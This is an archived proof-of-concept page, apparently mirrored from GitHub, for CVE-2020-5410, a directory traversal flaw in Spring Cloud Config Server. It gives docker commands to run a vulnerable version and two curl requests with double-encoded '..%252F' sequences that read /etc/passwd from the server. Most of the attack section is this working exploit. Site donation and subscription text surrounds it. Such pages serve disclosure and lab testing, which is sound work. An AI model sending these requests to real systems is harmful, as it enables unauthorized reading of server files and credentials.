Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-5410 PoC — Directory Traversal with spring-cloud-config-server

Source
https://github.com/osamahamad/CVE-2020-5410-POC
Associated Vulnerability
Title:Directory Traversal with spring-cloud-config-server (CVE-2020-5410)
Description:Spring Cloud Config, versions 2.2.x prior to 2.2.3, versions 2.1.x prior to 2.1.9, and older unsupported versions allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack.
Description
CVE-2020-5410 Spring Cloud Config directory traversal vulnerability
Readme

## CVE-2020-5410 Spring Cloud Config directory traversal vulnerability

#### Vulnerability description
Spring Cloud Config, version 2.2.x before 2.2.3, version 2.1.x before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.



#### Analysis

https://xz.aliyun.com/t/7877


#### Vulnerable Docker Install

Install any of the vulnerable versions https://hub.docker.com/r/hyness/spring-cloud-config-server/tags

```
docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE
```

```
docker run -it --name=spring-cloud-config-server \
-p 8888:8888 \
hyness/spring-cloud-config-server:2.1.6.RELEASE \
--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo
```


#### PoC

```
curl "vulnerablemachine:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"

```

```
curl "127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
```


/etc/passwd content in response for educational purposes only :) .
File Snapshot

 [4.0K]  /data/pocs/0f86041dc99e1e240beda8e2996e80e0abeacb68
└── [1.3K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →